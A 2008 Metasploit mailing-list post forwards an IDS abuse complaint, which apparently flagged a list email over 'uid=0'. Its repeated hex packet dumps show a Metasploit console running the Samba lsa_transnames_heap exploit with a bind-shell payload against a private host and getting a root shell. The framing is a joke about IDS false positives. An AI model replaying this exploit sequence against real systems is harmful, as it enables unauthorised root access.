Metasploit mailing list archives
(funny) Fwd: command execution response
From: jim.starke at benco.com (Jim Starke)
Date: Sat, 9 Feb 2008 14:07:55 -0500
Looks like they haven't fine tuned their IDS or actually investigate the actual packet. What triggered their IDS is the plain text "uid=0" in Ramon's message. Jim H D Moore <hdm at metasploit.com> 02/09/2008 01:24 PM Please respond to framework at metasploit.com To framework at metasploit.com cc Subject [framework] (funny) Fwd: command execution response Apparently Ramon's post was just too awesome for SecurePipe's managed IDS service. Check out the following email. Lets see if I can trigger it again using a copy of their alert message. ---------- Forwarded Message ---------- Subject: command execution response Date: Saturday 09 February 2008 From: Incident Reports <please_do_not_reply at securepipe.com> Complaint ID: [securepipe.com #154894326] The following is a complaint against an IP or domain which appeared in our logs, indicating possible network abuse. Should you need to contact us regarding this matter, please email: incident.inquiry-154894326 at securepipe.com A user, apparently from your network, initiated a network connection to a target computer that we manage. We consider the network traffic inappropriate or hostile. The following data describes the network traffic in question. Times are in UTC. [ 1] 9-Feb-2008 11:54:37 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 600 bytes data 0x0000 6170 2920 3e20 7365 7373 696f 6e73 202d ap) > sessions - 0x0010 6920 310d 0a5b 2a5d 2053 7461 7274 696e i 1..[*] Startin 0x0020 6720 696e 7465 7261 6374 696f 6e20 7769 g interaction wi 0x0030 7468 2031 2e2e 2e0d 0a0d 0a75 6e61 6d65 th 1.......uname 0x0040 202d 610d 0a4c 696e 7578 2065 6565 7063 -a..Linux eeepc 0x0050 2d72 6973 6520 322e 362e 3231 2e34 2d65 -rise 2.6.21.4-e 0x0060 6565 7063 2023 3231 2053 6174 204f 6374 eepc #21 Sat Oct 0x0070 2031 3320 3132 3a31 343a 3033 2045 4454 13 12:14:03 EDT 0x0080 2032 3030 3720 6936 3836 0d0a 474e 552f 2007 i686..GNU/ 0x0090 4c69 6e75 780d 0a69 640d 0a75 6964 3d30 Linux..id..uid=0 0x00a0 2872 6f6f 7429 2067 6964 3d30 2872 6f6f (root) gid=0(roo 0x00b0 7429 2065 6769 643d 3635 3533 3428 6e6f t) egid=65534(no 0x00c0 6772 6f75 7029 2067 726f 7570 733d 3635 group) groups=65 0x00d0 3533 3428 6e6f 6772 6f75 7029 0d0a 0d0a 534(nogroup).... 0x00e0 0d0a 4561 7379 2074 6f20 6c65 6172 6e2c ..Easy to learn, 0x00f0 2045 6173 7920 746f 2077 6f72 6b2c 2045 Easy to work, E 0x0100 6173 7920 746f 2072 6f6f 742e 0d0a 0d0a asy to root..... 0x0110 0d0a 5468 6520 6f72 6967 696e 616c 2062 ..The original b 0x0120 6c6f 6720 706f 7374 2061 6e64 206d 6f72 log post and mor 0x0130 6520 696e 666f 726d 6174 696f 6e20 6361 e information ca 0x0140 6e20 6265 2066 6f75 6e64 2069 6e20 6f75 n be found in ou 0x0150 720d 0a77 6562 7369 7465 2061 7420 6874 r..website at ht 0x0160 7470 3a2f 2f72 6973 6573 6563 7572 6974 tp://risesecurit 0x0170 792e 6f72 672f 2e0d 0a0d 0a42 6573 7420 y.org/.....Best 0x0180 7265 6761 7264 732c 0d0a 5261 6d6f 6e0d regards,..Ramon. 0x0190 0a2d 2d2d 2d2d 4245 4749 4e20 5047 5020 .-----BEGIN PGP 0x01a0 5349 474e 4154 5552 452d 2d2d 2d2d 0d0a SIGNATURE-----.. 0x01b0 5665 7273 696f 6e3a 2047 6e75 5047 2076 Version: GnuPG v 0x01c0 312e 322e 3620 2847 4e55 2f4c 696e 7578 1.2.6 (GNU/Linux 0x01d0 290d 0a0d 0a69 4438 4442 5146 4872 5a4b )....iD8DBQFHrZK 0x01e0 4c47 4953 3069 4575 6870 344d 5241 726d LGIS0iEuhp4MRArm 0x01f0 7341 4a39 5a6b 2f48 3371 5967 4e7a 5344 sAJ9Zk/H3qYgNzSD 0x0200 5067 5061 737a 3655 4d33 396e 4d6a 7743 PgPasz6UM39nMjwC 0x0210 654b 526f 470d 0a32 584e 536d 4c6a 7737 eKRoG..2XNSmLjw7 0x0220 4f6c 6f41 6865 5334 334e 2b32 6f67 3d0d OloAheS43N+2og=. 0x0230 0a3d 6248 7a63 0d0a 2d2d 2d2d 2d45 4e44 .=bHzc..-----END 0x0240 2050 4750 2053 4947 4e41 5455 5245 2d2d PGP SIGNATURE-- 0x0250 2d2d 2d0d 0a2e 0d0a ---..... [ 2] 9-Feb-2008 11:54:37 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 600 bytes data 0x0000 6170 2920 3e20 7365 7373 696f 6e73 202d ap) > sessions - 0x0010 6920 310d 0a5b 2a5d 2053 7461 7274 696e i 1..[*] Startin 0x0020 6720 696e 7465 7261 6374 696f 6e20 7769 g interaction wi 0x0030 7468 2031 2e2e 2e0d 0a0d 0a75 6e61 6d65 th 1.......uname 0x0040 202d 610d 0a4c 696e 7578 2065 6565 7063 -a..Linux eeepc 0x0050 2d72 6973 6520 322e 362e 3231 2e34 2d65 -rise 2.6.21.4-e 0x0060 6565 7063 2023 3231 2053 6174 204f 6374 eepc #21 Sat Oct 0x0070 2031 3320 3132 3a31 343a 3033 2045 4454 13 12:14:03 EDT 0x0080 2032 3030 3720 6936 3836 0d0a 474e 552f 2007 i686..GNU/ 0x0090 4c69 6e75 780d 0a69 640d 0a75 6964 3d30 Linux..id..uid=0 0x00a0 2872 6f6f 7429 2067 6964 3d30 2872 6f6f (root) gid=0(roo 0x00b0 7429 2065 6769 643d 3635 3533 3428 6e6f t) egid=65534(no 0x00c0 6772 6f75 7029 2067 726f 7570 733d 3635 group) groups=65 0x00d0 3533 3428 6e6f 6772 6f75 7029 0d0a 0d0a 534(nogroup).... 0x00e0 0d0a 4561 7379 2074 6f20 6c65 6172 6e2c ..Easy to learn, 0x00f0 2045 6173 7920 746f 2077 6f72 6b2c 2045 Easy to work, E 0x0100 6173 7920 746f 2072 6f6f 742e 0d0a 0d0a asy to root..... 0x0110 0d0a 5468 6520 6f72 6967 696e 616c 2062 ..The original b 0x0120 6c6f 6720 706f 7374 2061 6e64 206d 6f72 log post and mor 0x0130 6520 696e 666f 726d 6174 696f 6e20 6361 e information ca 0x0140 6e20 6265 2066 6f75 6e64 2069 6e20 6f75 n be found in ou 0x0150 720d 0a77 6562 7369 7465 2061 7420 6874 r..website at ht 0x0160 7470 3a2f 2f72 6973 6573 6563 7572 6974 tp://risesecurit 0x0170 792e 6f72 672f 2e0d 0a0d 0a42 6573 7420 y.org/.....Best 0x0180 7265 6761 7264 732c 0d0a 5261 6d6f 6e0d regards,..Ramon. 0x0190 0a2d 2d2d 2d2d 4245 4749 4e20 5047 5020 .-----BEGIN PGP 0x01a0 5349 474e 4154 5552 452d 2d2d 2d2d 0d0a SIGNATURE-----.. 0x01b0 5665 7273 696f 6e3a 2047 6e75 5047 2076 Version: GnuPG v 0x01c0 312e 322e 3620 2847 4e55 2f4c 696e 7578 1.2.6 (GNU/Linux 0x01d0 290d 0a0d 0a69 4438 4442 5146 4872 5a4b )....iD8DBQFHrZK 0x01e0 4c47 4953 3069 4575 6870 344d 5241 726d LGIS0iEuhp4MRArm 0x01f0 7341 4a39 5a6b 2f48 3371 5967 4e7a 5344 sAJ9Zk/H3qYgNzSD 0x0200 5067 5061 737a 3655 4d33 396e 4d6a 7743 PgPasz6UM39nMjwC 0x0210 654b 526f 470d 0a32 584e 536d 4c6a 7737 eKRoG..2XNSmLjw7 0x0220 4f6c 6f41 6865 5334 334e 2b32 6f67 3d0d OloAheS43N+2og=. 0x0230 0a3d 6248 7a63 0d0a 2d2d 2d2d 2d45 4e44 .=bHzc..-----END 0x0240 2050 4750 2053 4947 4e41 5455 5245 2d2d PGP SIGNATURE-- 0x0250 2d2d 2d0d 0a2e 0d0a ---..... [ 3] 9-Feb-2008 11:54:36 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 1368 bytes data 0x0000 7573 696e 670d 0a74 6865 2044 6562 6961 using..the Debia 0x0010 6e2f 5562 756e 7475 2074 6172 6765 7420 n/Ubuntu target 0x0020 2858 616e 6472 6f73 2069 7320 6261 7365 (Xandros is base 0x0030 6420 6f6e 2043 6f72 656c 204c 696e 7578 d on Corel Linux 0x0040 2c20 7768 6963 6820 6973 0d0a 4465 6269 , which is..Debi 0x0050 616e 2062 6173 6564 292e 0d0a 0d0a 0d0a an based)....... 0x0060 6d73 6620 3e20 7573 6520 6c69 6e75 782f msf > use linux/ 0x0070 7361 6d62 612f 6c73 615f 7472 616e 736e samba/lsa_transn 0x0080 616d 6573 5f68 6561 700d 0a6d 7366 2065 ames_heap..msf e 0x0090 7870 6c6f 6974 286c 7361 5f74 7261 6e73 xploit(lsa_trans 0x00a0 6e61 6d65 735f 6865 6170 2920 3e20 7365 names_heap) > se 0x00b0 7420 5248 4f53 5420 3139 322e 3136 382e t RHOST 192.168. 0x00c0 3530 2e31 300d 0a52 484f 5354 203d 3e20 50.10..RHOST => 0x00d0 3139 322e 3136 382e 3530 2e31 300d 0a6d 192.168.50.10..m 0x00e0 7366 2065 7870 6c6f 6974 286c 7361 5f74 sf exploit(lsa_t 0x00f0 7261 6e73 6e61 6d65 735f 6865 6170 2920 ransnames_heap) 0x0100 3e20 7365 7420 5041 594c 4f41 4420 6c69 > set PAYLOAD li 0x0110 6e75 782f 7838 362f 7368 656c 6c5f 6269 nux/x86/shell_bi 0x0120 6e64 5f74 6370 0d0a 5041 594c 4f41 4420 nd_tcp..PAYLOAD 0x0130 3d3e 206c 696e 7578 2f78 3836 2f73 6865 => linux/x86/she 0x0140 6c6c 5f62 696e 645f 7463 700d 0a6d 7366 ll_bind_tcp..msf 0x0150 2065 7870 6c6f 6974 286c 7361 5f74 7261 exploit(lsa_tra 0x0160 6e73 6e61 6d65 735f 6865 6170 2920 3e20 nsnames_heap) > 0x0170 7368 6f77 2074 6172 6765 7473 0d0a 0d0a show targets.... 0x0180 4578 706c 6f69 7420 7461 7267 6574 733a Exploit targets: 0x0190 0d0a 0d0a 2020 2049 6420 204e 616d 650d .... Id Name. 0x01a0 0a20 2020 2d2d 2020 2d2d 2d2d 0d0a 2020 . -- ----.. 0x01b0 2030 2020 204c 696e 7578 2076 7379 7363 0 Linux vsysc 0x01c0 616c 6c0d 0a20 2020 3120 2020 4c69 6e75 all.. 1 Linu 0x01d0 7820 4865 6170 2042 7275 7465 2046 6f72 x Heap Brute For 0x01e0 6365 2028 4465 6269 616e 2f55 6275 6e74 ce (Debian/Ubunt 0x01f0 7529 0d0a 2020 2032 2020 204c 696e 7578 u).. 2 Linux 0x0200 2048 6561 7020 4272 7574 6520 466f 7263 Heap Brute Forc 0x0210 6520 2847 656e 746f 6f29 0d0a 2020 2033 e (Gentoo).. 3 0x0220 2020 204c 696e 7578 2048 6561 7020 4272 Linux Heap Br 0x0230 7574 6520 466f 7263 6520 284d 616e 6472 ute Force (Mandr 0x0240 6976 6129 0d0a 2020 2034 2020 204c 696e iva).. 4 Lin 0x0250 7578 2048 6561 7020 4272 7574 6520 466f ux Heap Brute Fo 0x0260 7263 6520 2852 4845 4c2f 4365 6e74 4f53 rce (RHEL/CentOS 0x0270 290d 0a20 2020 3520 2020 4c69 6e75 7820 ).. 5 Linux 0x0280 4865 6170 2042 7275 7465 2046 6f72 6365 Heap Brute Force 0x0290 2028 5355 5345 290d 0a20 2020 3620 2020 (SUSE).. 6 0x02a0 4c69 6e75 7820 4865 6170 2042 7275 7465 Linux Heap Brute 0x02b0 2046 6f72 6365 2028 536c 6163 6b77 6172 Force (Slackwar 0x02c0 6529 0d0a 2020 2037 2020 2044 4542 5547 e).. 7 DEBUG 0x02d0 0d0a 0d0a 0d0a 6d73 6620 6578 706c 6f69 ......msf exploi 0x02e0 7428 6c73 615f 7472 616e 736e 616d 6573 t(lsa_transnames 0x02f0 5f68 6561 7029 203e 2073 6574 2054 4152 _heap) > set TAR 0x0300 4745 5420 310d 0a54 4152 4745 5420 3d3e GET 1..TARGET => 0x0310 2031 0d0a 6d73 6620 6578 706c 6f69 7428 1..msf exploit( 0x0320 6c73 615f 7472 616e 736e 616d 6573 5f68 lsa_transnames_h 0x0330 6561 7029 203e 2065 7870 6c6f 6974 0d0a eap) > exploit.. 0x0340 5b2a 5d20 5374 6172 7465 6420 6269 6e64 [*] Started bind 0x0350 2068 616e 646c 6572 0d0a 5b2a 5d20 4372 handler..[*] Cr 0x0360 6561 7469 6e67 206e 6f70 2073 6c65 642e eating nop sled. 0x0370 2e2e 2e0d 0a2e 2e2e 2e0d 0a5b 2a5d 2054 ...........[*] T 0x0380 7279 696e 6720 746f 2065 7870 6c6f 6974 rying to exploit 0x0390 2053 616d 6261 2077 6974 6820 6164 6472 Samba with addr 0x03a0 6573 7320 3078 3038 3431 3530 3030 2e2e ess 0x08415000.. 0x03b0 2e0d 0a5b 2a5d 2043 6f6e 6e65 6374 696e ...[*] Connectin 0x03c0 6720 746f 2074 6865 2053 4d42 2073 6572 g to the SMB ser 0x03d0 7669 6365 2e2e 2e0d 0a5b 2a5d 2042 696e vice.....[*] Bin 0x03e0 6469 6e67 2074 6f0d 0a31 3233 3435 3737 ding to..1234577 0x03f0 382d 3132 3334 2d61 6263 642d 6566 3030 8-1234-abcd-ef00 0x0400 2d30 3132 3334 3536 3738 3961 623a 302e -0123456789ab:0. 0x0410 3040 6e63 6163 6e5f 6e70 3a31 3932 2e31 0 at ncacn_np:192.1 0x0420 3638 2e35 302e 3130 5b5c 6c73 6172 7063 68.50.10[\lsarpc 0x0430 5d20 2e2e 2e0d 0a5b 2a5d 2042 6f75 6e64 ] .....[*] Bound 0x0440 2074 6f0d 0a31 3233 3435 3737 382d 3132 to..12345778-12 0x0450 3334 2d61 6263 642d 6566 3030 2d30 3132 34-abcd-ef00-012 0x0460 3334 3536 3738 3961 623a 302e 3040 6e63 3456789ab:0.0 at nc 0x0470 6163 6e5f 6e70 3a31 3932 2e31 3638 2e35 acn_np:192.168.5 0x0480 302e 3130 5b5c 6c73 6172 7063 5d20 2e2e 0.10[\lsarpc] .. 0x0490 2e0d 0a5b 2a5d 2043 616c 6c69 6e67 2074 ...[*] Calling t 0x04a0 6865 2076 756c 6e65 7261 626c 6520 6675 he vulnerable fu 0x04b0 6e63 7469 6f6e 2e2e 2e0d 0a5b 2b5d 2053 nction.....[+] S 0x04c0 6572 7665 7220 6469 6420 6e6f 7420 7265 erver did not re 0x04d0 7370 6f6e 642c 2074 6869 7320 6973 2065 spond, this is e 0x04e0 7870 6563 7465 640d 0a5b 2a5d 2043 6f6d xpected..[*] Com 0x04f0 6d61 6e64 2073 6865 6c6c 2073 6573 7369 mand shell sessi 0x0500 6f6e 2031 206f 7065 6e65 6420 2831 3932 on 1 opened (192 0x0510 2e31 3638 2e35 302e 3230 313a 3333 3639 .168.50.201:3369 0x0520 3420 2d3e 0d0a 3139 322e 3136 382e 3530 4 ->..192.168.50 0x0530 2e31 303a 3434 3434 290d 0a6d 7366 2065 .10:4444)..msf e 0x0540 7870 6c6f 6974 286c 7361 5f74 7261 6e73 xploit(lsa_trans 0x0550 6e61 6d65 735f 6865 names_he [ 4] 9-Feb-2008 11:54:37 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 600 bytes data 0x0000 6170 2920 3e20 7365 7373 696f 6e73 202d ap) > sessions - 0x0010 6920 310d 0a5b 2a5d 2053 7461 7274 696e i 1..[*] Startin 0x0020 6720 696e 7465 7261 6374 696f 6e20 7769 g interaction wi 0x0030 7468 2031 2e2e 2e0d 0a0d 0a75 6e61 6d65 th 1.......uname 0x0040 202d 610d 0a4c 696e 7578 2065 6565 7063 -a..Linux eeepc 0x0050 2d72 6973 6520 322e 362e 3231 2e34 2d65 -rise 2.6.21.4-e 0x0060 6565 7063 2023 3231 2053 6174 204f 6374 eepc #21 Sat Oct 0x0070 2031 3320 3132 3a31 343a 3033 2045 4454 13 12:14:03 EDT 0x0080 2032 3030 3720 6936 3836 0d0a 474e 552f 2007 i686..GNU/ 0x0090 4c69 6e75 780d 0a69 640d 0a75 6964 3d30 Linux..id..uid=0 0x00a0 2872 6f6f 7429 2067 6964 3d30 2872 6f6f (root) gid=0(roo 0x00b0 7429 2065 6769 643d 3635 3533 3428 6e6f t) egid=65534(no 0x00c0 6772 6f75 7029 2067 726f 7570 733d 3635 group) groups=65 0x00d0 3533 3428 6e6f 6772 6f75 7029 0d0a 0d0a 534(nogroup).... 0x00e0 0d0a 4561 7379 2074 6f20 6c65 6172 6e2c ..Easy to learn, 0x00f0 2045 6173 7920 746f 2077 6f72 6b2c 2045 Easy to work, E 0x0100 6173 7920 746f 2072 6f6f 742e 0d0a 0d0a asy to root..... 0x0110 0d0a 5468 6520 6f72 6967 696e 616c 2062 ..The original b 0x0120 6c6f 6720 706f 7374 2061 6e64 206d 6f72 log post and mor 0x0130 6520 696e 666f 726d 6174 696f 6e20 6361 e information ca 0x0140 6e20 6265 2066 6f75 6e64 2069 6e20 6f75 n be found in ou 0x0150 720d 0a77 6562 7369 7465 2061 7420 6874 r..website at ht 0x0160 7470 3a2f 2f72 6973 6573 6563 7572 6974 tp://risesecurit 0x0170 792e 6f72 672f 2e0d 0a0d 0a42 6573 7420 y.org/.....Best 0x0180 7265 6761 7264 732c 0d0a 5261 6d6f 6e0d regards,..Ramon. 0x0190 0a2d 2d2d 2d2d 4245 4749 4e20 5047 5020 .-----BEGIN PGP 0x01a0 5349 474e 4154 5552 452d 2d2d 2d2d 0d0a SIGNATURE-----.. 0x01b0 5665 7273 696f 6e3a 2047 6e75 5047 2076 Version: GnuPG v 0x01c0 312e 322e 3620 2847 4e55 2f4c 696e 7578 1.2.6 (GNU/Linux 0x01d0 290d 0a0d 0a69 4438 4442 5146 4872 5a4b )....iD8DBQFHrZK 0x01e0 4c47 4953 3069 4575 6870 344d 5241 726d LGIS0iEuhp4MRArm 0x01f0 7341 4a39 5a6b 2f48 3371 5967 4e7a 5344 sAJ9Zk/H3qYgNzSD 0x0200 5067 5061 737a 3655 4d33 396e 4d6a 7743 PgPasz6UM39nMjwC 0x0210 654b 526f 470d 0a32 584e 536d 4c6a 7737 eKRoG..2XNSmLjw7 0x0220 4f6c 6f41 6865 5334 334e 2b32 6f67 3d0d OloAheS43N+2og=. 0x0230 0a3d 6248 7a63 0d0a 2d2d 2d2d 2d45 4e44 .=bHzc..-----END 0x0240 2050 4750 2053 4947 4e41 5455 5245 2d2d PGP SIGNATURE-- 0x0250 2d2d 2d0d 0a2e 0d0a ---..... We appreciate your assistance in resolving this matter. -- SecurePipe Incident Inquiry Desk Tel: +1 608 294 6940 Fax: +1 608 294 6950 incident.inquiry-154894326 at securepipe.com ------------------------------------------------------- Complaint ID: [securepipe.com #154894326] The following is a complaint against an IP or domain which appeared in our logs, indicating possible network abuse. Should you need to contact us regarding this matter, please email: incident.inquiry-154894326 at securepipe.com A user, apparently from your network, initiated a network connection to a target computer that we manage. We consider the network traffic inappropriate or hostile. The following data describes the network traffic in question. Times are in UTC. [ 1] 9-Feb-2008 11:54:37 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 600 bytes data 0x0000 6170 2920 3e20 7365 7373 696f 6e73 202d ap) > sessions - 0x0010 6920 310d 0a5b 2a5d 2053 7461 7274 696e i 1..[*] Startin 0x0020 6720 696e 7465 7261 6374 696f 6e20 7769 g interaction wi 0x0030 7468 2031 2e2e 2e0d 0a0d 0a75 6e61 6d65 th 1.......uname 0x0040 202d 610d 0a4c 696e 7578 2065 6565 7063 -a..Linux eeepc 0x0050 2d72 6973 6520 322e 362e 3231 2e34 2d65 -rise 2.6.21.4-e 0x0060 6565 7063 2023 3231 2053 6174 204f 6374 eepc #21 Sat Oct 0x0070 2031 3320 3132 3a31 343a 3033 2045 4454 13 12:14:03 EDT 0x0080 2032 3030 3720 6936 3836 0d0a 474e 552f 2007 i686..GNU/ 0x0090 4c69 6e75 780d 0a69 640d 0a75 6964 3d30 Linux..id..uid=0 0x00a0 2872 6f6f 7429 2067 6964 3d30 2872 6f6f (root) gid=0(roo 0x00b0 7429 2065 6769 643d 3635 3533 3428 6e6f t) egid=65534(no 0x00c0 6772 6f75 7029 2067 726f 7570 733d 3635 group) groups=65 0x00d0 3533 3428 6e6f 6772 6f75 7029 0d0a 0d0a 534(nogroup).... 0x00e0 0d0a 4561 7379 2074 6f20 6c65 6172 6e2c ..Easy to learn, 0x00f0 2045 6173 7920 746f 2077 6f72 6b2c 2045 Easy to work, E 0x0100 6173 7920 746f 2072 6f6f 742e 0d0a 0d0a asy to root..... 0x0110 0d0a 5468 6520 6f72 6967 696e 616c 2062 ..The original b 0x0120 6c6f 6720 706f 7374 2061 6e64 206d 6f72 log post and mor 0x0130 6520 696e 666f 726d 6174 696f 6e20 6361 e information ca 0x0140 6e20 6265 2066 6f75 6e64 2069 6e20 6f75 n be found in ou 0x0150 720d 0a77 6562 7369 7465 2061 7420 6874 r..website at ht 0x0160 7470 3a2f 2f72 6973 6573 6563 7572 6974 tp://risesecurit 0x0170 792e 6f72 672f 2e0d 0a0d 0a42 6573 7420 y.org/.....Best 0x0180 7265 6761 7264 732c 0d0a 5261 6d6f 6e0d regards,..Ramon. 0x0190 0a2d 2d2d 2d2d 4245 4749 4e20 5047 5020 .-----BEGIN PGP 0x01a0 5349 474e 4154 5552 452d 2d2d 2d2d 0d0a SIGNATURE-----.. 0x01b0 5665 7273 696f 6e3a 2047 6e75 5047 2076 Version: GnuPG v 0x01c0 312e 322e 3620 2847 4e55 2f4c 696e 7578 1.2.6 (GNU/Linux 0x01d0 290d 0a0d 0a69 4438 4442 5146 4872 5a4b )....iD8DBQFHrZK 0x01e0 4c47 4953 3069 4575 6870 344d 5241 726d LGIS0iEuhp4MRArm 0x01f0 7341 4a39 5a6b 2f48 3371 5967 4e7a 5344 sAJ9Zk/H3qYgNzSD 0x0200 5067 5061 737a 3655 4d33 396e 4d6a 7743 PgPasz6UM39nMjwC 0x0210 654b 526f 470d 0a32 584e 536d 4c6a 7737 eKRoG..2XNSmLjw7 0x0220 4f6c 6f41 6865 5334 334e 2b32 6f67 3d0d OloAheS43N+2og=. 0x0230 0a3d 6248 7a63 0d0a 2d2d 2d2d 2d45 4e44 .=bHzc..-----END 0x0240 2050 4750 2053 4947 4e41 5455 5245 2d2d PGP SIGNATURE-- 0x0250 2d2d 2d0d 0a2e 0d0a ---..... [ 2] 9-Feb-2008 11:54:37 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 600 bytes data 0x0000 6170 2920 3e20 7365 7373 696f 6e73 202d ap) > sessions - 0x0010 6920 310d 0a5b 2a5d 2053 7461 7274 696e i 1..[*] Startin 0x0020 6720 696e 7465 7261 6374 696f 6e20 7769 g interaction wi 0x0030 7468 2031 2e2e 2e0d 0a0d 0a75 6e61 6d65 th 1.......uname 0x0040 202d 610d 0a4c 696e 7578 2065 6565 7063 -a..Linux eeepc 0x0050 2d72 6973 6520 322e 362e 3231 2e34 2d65 -rise 2.6.21.4-e 0x0060 6565 7063 2023 3231 2053 6174 204f 6374 eepc #21 Sat Oct 0x0070 2031 3320 3132 3a31 343a 3033 2045 4454 13 12:14:03 EDT 0x0080 2032 3030 3720 6936 3836 0d0a 474e 552f 2007 i686..GNU/ 0x0090 4c69 6e75 780d 0a69 640d 0a75 6964 3d30 Linux..id..uid=0 0x00a0 2872 6f6f 7429 2067 6964 3d30 2872 6f6f (root) gid=0(roo 0x00b0 7429 2065 6769 643d 3635 3533 3428 6e6f t) egid=65534(no 0x00c0 6772 6f75 7029 2067 726f 7570 733d 3635 group) groups=65 0x00d0 3533 3428 6e6f 6772 6f75 7029 0d0a 0d0a 534(nogroup).... 0x00e0 0d0a 4561 7379 2074 6f20 6c65 6172 6e2c ..Easy to learn, 0x00f0 2045 6173 7920 746f 2077 6f72 6b2c 2045 Easy to work, E 0x0100 6173 7920 746f 2072 6f6f 742e 0d0a 0d0a asy to root..... 0x0110 0d0a 5468 6520 6f72 6967 696e 616c 2062 ..The original b 0x0120 6c6f 6720 706f 7374 2061 6e64 206d 6f72 log post and mor 0x0130 6520 696e 666f 726d 6174 696f 6e20 6361 e information ca 0x0140 6e20 6265 2066 6f75 6e64 2069 6e20 6f75 n be found in ou 0x0150 720d 0a77 6562 7369 7465 2061 7420 6874 r..website at ht 0x0160 7470 3a2f 2f72 6973 6573 6563 7572 6974 tp://risesecurit 0x0170 792e 6f72 672f 2e0d 0a0d 0a42 6573 7420 y.org/.....Best 0x0180 7265 6761 7264 732c 0d0a 5261 6d6f 6e0d regards,..Ramon. 0x0190 0a2d 2d2d 2d2d 4245 4749 4e20 5047 5020 .-----BEGIN PGP 0x01a0 5349 474e 4154 5552 452d 2d2d 2d2d 0d0a SIGNATURE-----.. 0x01b0 5665 7273 696f 6e3a 2047 6e75 5047 2076 Version: GnuPG v 0x01c0 312e 322e 3620 2847 4e55 2f4c 696e 7578 1.2.6 (GNU/Linux 0x01d0 290d 0a0d 0a69 4438 4442 5146 4872 5a4b )....iD8DBQFHrZK 0x01e0 4c47 4953 3069 4575 6870 344d 5241 726d LGIS0iEuhp4MRArm 0x01f0 7341 4a39 5a6b 2f48 3371 5967 4e7a 5344 sAJ9Zk/H3qYgNzSD 0x0200 5067 5061 737a 3655 4d33 396e 4d6a 7743 PgPasz6UM39nMjwC 0x0210 654b 526f 470d 0a32 584e 536d 4c6a 7737 eKRoG..2XNSmLjw7 0x0220 4f6c 6f41 6865 5334 334e 2b32 6f67 3d0d OloAheS43N+2og=. 0x0230 0a3d 6248 7a63 0d0a 2d2d 2d2d 2d45 4e44 .=bHzc..-----END 0x0240 2050 4750 2053 4947 4e41 5455 5245 2d2d PGP SIGNATURE-- 0x0250 2d2d 2d0d 0a2e 0d0a ---..... [ 3] 9-Feb-2008 11:54:36 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 1368 bytes data 0x0000 7573 696e 670d 0a74 6865 2044 6562 6961 using..the Debia 0x0010 6e2f 5562 756e 7475 2074 6172 6765 7420 n/Ubuntu target 0x0020 2858 616e 6472 6f73 2069 7320 6261 7365 (Xandros is base 0x0030 6420 6f6e 2043 6f72 656c 204c 696e 7578 d on Corel Linux 0x0040 2c20 7768 6963 6820 6973 0d0a 4465 6269 , which is..Debi 0x0050 616e 2062 6173 6564 292e 0d0a 0d0a 0d0a an based)....... 0x0060 6d73 6620 3e20 7573 6520 6c69 6e75 782f msf > use linux/ 0x0070 7361 6d62 612f 6c73 615f 7472 616e 736e samba/lsa_transn 0x0080 616d 6573 5f68 6561 700d 0a6d 7366 2065 ames_heap..msf e 0x0090 7870 6c6f 6974 286c 7361 5f74 7261 6e73 xploit(lsa_trans 0x00a0 6e61 6d65 735f 6865 6170 2920 3e20 7365 names_heap) > se 0x00b0 7420 5248 4f53 5420 3139 322e 3136 382e t RHOST 192.168. 0x00c0 3530 2e31 300d 0a52 484f 5354 203d 3e20 50.10..RHOST => 0x00d0 3139 322e 3136 382e 3530 2e31 300d 0a6d 192.168.50.10..m 0x00e0 7366 2065 7870 6c6f 6974 286c 7361 5f74 sf exploit(lsa_t 0x00f0 7261 6e73 6e61 6d65 735f 6865 6170 2920 ransnames_heap) 0x0100 3e20 7365 7420 5041 594c 4f41 4420 6c69 > set PAYLOAD li 0x0110 6e75 782f 7838 362f 7368 656c 6c5f 6269 nux/x86/shell_bi 0x0120 6e64 5f74 6370 0d0a 5041 594c 4f41 4420 nd_tcp..PAYLOAD 0x0130 3d3e 206c 696e 7578 2f78 3836 2f73 6865 => linux/x86/she 0x0140 6c6c 5f62 696e 645f 7463 700d 0a6d 7366 ll_bind_tcp..msf 0x0150 2065 7870 6c6f 6974 286c 7361 5f74 7261 exploit(lsa_tra 0x0160 6e73 6e61 6d65 735f 6865 6170 2920 3e20 nsnames_heap) > 0x0170 7368 6f77 2074 6172 6765 7473 0d0a 0d0a show targets.... 0x0180 4578 706c 6f69 7420 7461 7267 6574 733a Exploit targets: 0x0190 0d0a 0d0a 2020 2049 6420 204e 616d 650d .... Id Name. 0x01a0 0a20 2020 2d2d 2020 2d2d 2d2d 0d0a 2020 . -- ----.. 0x01b0 2030 2020 204c 696e 7578 2076 7379 7363 0 Linux vsysc 0x01c0 616c 6c0d 0a20 2020 3120 2020 4c69 6e75 all.. 1 Linu 0x01d0 7820 4865 6170 2042 7275 7465 2046 6f72 x Heap Brute For 0x01e0 6365 2028 4465 6269 616e 2f55 6275 6e74 ce (Debian/Ubunt 0x01f0 7529 0d0a 2020 2032 2020 204c 696e 7578 u).. 2 Linux 0x0200 2048 6561 7020 4272 7574 6520 466f 7263 Heap Brute Forc 0x0210 6520 2847 656e 746f 6f29 0d0a 2020 2033 e (Gentoo).. 3 0x0220 2020 204c 696e 7578 2048 6561 7020 4272 Linux Heap Br 0x0230 7574 6520 466f 7263 6520 284d 616e 6472 ute Force (Mandr 0x0240 6976 6129 0d0a 2020 2034 2020 204c 696e iva).. 4 Lin 0x0250 7578 2048 6561 7020 4272 7574 6520 466f ux Heap Brute Fo 0x0260 7263 6520 2852 4845 4c2f 4365 6e74 4f53 rce (RHEL/CentOS 0x0270 290d 0a20 2020 3520 2020 4c69 6e75 7820 ).. 5 Linux 0x0280 4865 6170 2042 7275 7465 2046 6f72 6365 Heap Brute Force 0x0290 2028 5355 5345 290d 0a20 2020 3620 2020 (SUSE).. 6 0x02a0 4c69 6e75 7820 4865 6170 2042 7275 7465 Linux Heap Brute 0x02b0 2046 6f72 6365 2028 536c 6163 6b77 6172 Force (Slackwar 0x02c0 6529 0d0a 2020 2037 2020 2044 4542 5547 e).. 7 DEBUG 0x02d0 0d0a 0d0a 0d0a 6d73 6620 6578 706c 6f69 ......msf exploi 0x02e0 7428 6c73 615f 7472 616e 736e 616d 6573 t(lsa_transnames 0x02f0 5f68 6561 7029 203e 2073 6574 2054 4152 _heap) > set 